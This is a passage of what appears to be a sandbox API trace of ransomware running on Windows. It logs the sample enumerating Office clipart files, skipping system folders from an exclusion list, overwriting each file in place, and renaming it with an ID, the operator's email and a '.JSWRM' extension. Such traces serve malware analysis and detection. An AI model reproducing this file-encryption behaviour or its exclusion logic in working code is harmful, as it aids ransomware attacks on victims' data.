office\\root\\clipart\\pub60cor\\j0186362.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.818] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=17662) returned 1 [0086.818] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x44f0) returned 0x24d210 [0086.819] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x44f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x44f0, lpOverlapped=0x0) returned 1 [0086.822] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.822] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x44f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x44f0, lpOverlapped=0x0) returned 1 [0086.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.822] CloseHandle (hObject=0x314) returned 1 [0086.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0086.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0086.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0086.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0086.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0086.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0086.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0086.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0086.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.823] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186362.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0186362.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186362.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0186362.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0086.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0086.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0086.824] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb1606f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb1606f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb3c2ce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4724, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0186364.WMF", cAlternateFileName="")) returned 1 [0086.824] lstrcmpiW (lpString1="J0186364.WMF", lpString2=".") returned 1 [0086.824] lstrcmpiW (lpString1="J0186364.WMF", lpString2="..") returned 1 [0086.824] lstrcmpiW (lpString1="J0186364.WMF", lpString2="...") returned 1 [0086.824] lstrcmpiW (lpString1="J0186364.WMF", lpString2="windows") returned -1 [0086.824] lstrcmpiW (lpString1="J0186364.WMF", lpString2="recovery") returned -1 [0086.824] lstrcmpiW (lpString1="J0186364.WMF", lpString2="perflogs") returned -1 [0086.824] lstrcmpiW (lpString1="J0186364.WMF", lpString2="documents and settings") returned 1 [0086.824] lstrcmpiW (lpString1="J0186364.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.824] lstrcmpiW (lpString1="J0186364.WMF", lpString2="system volume information") returned -1 [0086.824] lstrcmpiW (lpString1="J0186364.WMF", lpString2="msocache") returned -1 [0086.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0086.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0186364.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0186364.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0186364.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0086.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0086.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0186364.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0186364.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0186364.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0086.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0086.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0086.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0086.825] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186364.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0186364.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.825] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=18212) returned 1 [0086.825] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4720) returned 0x24d210 [0086.825] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4720, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4720, lpOverlapped=0x0) returned 1 [0086.829] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.829] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4720, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4720, lpOverlapped=0x0) returned 1 [0086.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.829] CloseHandle (hObject=0x314) returned 1 [0086.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0086.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0086.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0086.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0086.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0086.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0086.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0086.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0086.830] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186364.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0186364.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0186364.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0186364.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0086.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0086.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0086.831] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb1606f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb1606f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb3c2ce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x19c4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0187647.WMF", cAlternateFileName="")) returned 1 [0086.831] lstrcmpiW (lpString1="J0187647.WMF", lpString2=".") returned 1 [0086.831] lstrcmpiW (lpString1="J0187647.WMF", lpString2="..") returned 1 [0086.831] lstrcmpiW (lpString1="J0187647.WMF", lpString2="...") returned 1 [0086.831] lstrcmpiW (lpString1="J0187647.WMF", lpString2="windows") returned -1 [0086.831] lstrcmpiW (lpString1="J0187647.WMF", lpString2="recovery") returned -1 [0086.831] lstrcmpiW (lpString1="J0187647.WMF", lpString2="perflogs") returned -1 [0086.831] lstrcmpiW (lpString1="J0187647.WMF", lpString2="documents and settings") returned 1 [0086.831] lstrcmpiW (lpString1="J0187647.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.831] lstrcmpiW (lpString1="J0187647.WMF", lpString2="system volume information") returned -1 [0086.831] lstrcmpiW (lpString1="J0187647.WMF", lpString2="msocache") returned -1 [0086.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0086.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187647.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187647.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187647.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0086.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0086.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187647.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187647.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187647.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0086.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0086.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0086.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0086.831] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187647.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187647.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.832] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6596) returned 1 [0086.832] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.832] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x19c0) returned 0x205850 [0086.832] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x19c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x19c0, lpOverlapped=0x0) returned 1 [0086.835] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.835] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x19c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x19c0, lpOverlapped=0x0) returned 1 [0086.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0086.835] CloseHandle (hObject=0x314) returned 1 [0086.835] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0086.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0086.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0086.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0086.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0086.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0086.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0086.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0086.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0086.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0086.836] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187647.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187647.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187647.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187647.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0086.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0086.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0086.837] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb1606f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb1606f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb1606f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1500, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0187815.WMF", cAlternateFileName="")) returned 1 [0086.837] lstrcmpiW (lpString1="J0187815.WMF", lpString2=".") returned 1 [0086.837] lstrcmpiW (lpString1="J0187815.WMF", lpString2="..") returned 1 [0086.837] lstrcmpiW (lpString1="J0187815.WMF", lpString2="...") returned 1 [0086.837] lstrcmpiW (lpString1="J0187815.WMF", lpString2="windows") returned -1 [0086.837] lstrcmpiW (lpString1="J0187815.WMF", lpString2="recovery") returned -1 [0086.837] lstrcmpiW (lpString1="J0187815.WMF", lpString2="perflogs") returned -1 [0086.837] lstrcmpiW (lpString1="J0187815.WMF", lpString2="documents and settings") returned 1 [0086.837] lstrcmpiW (lpString1="J0187815.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.837] lstrcmpiW (lpString1="J0187815.WMF", lpString2="system volume information") returned -1 [0086.837] lstrcmpiW (lpString1="J0187815.WMF", lpString2="msocache") returned -1 [0086.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0086.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187815.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187815.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187815.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0086.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0086.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187815.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0187815.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0187815.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0086.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0086.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0086.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0086.837] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0187815.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0187815.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.838] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5376) returned 1 [0086.838] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.838] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1500) returned 0x205850 [0086.838] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1500, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1500, lpOverlapped=0x0) returned 1 [0086.840] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.840] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1500, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1500, lpOverlapped=0x0) returned 1 [0086.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0086.840] CloseHandle (hObject=0x314) returned 1 [0086.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0086.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.840] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0086.840] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) 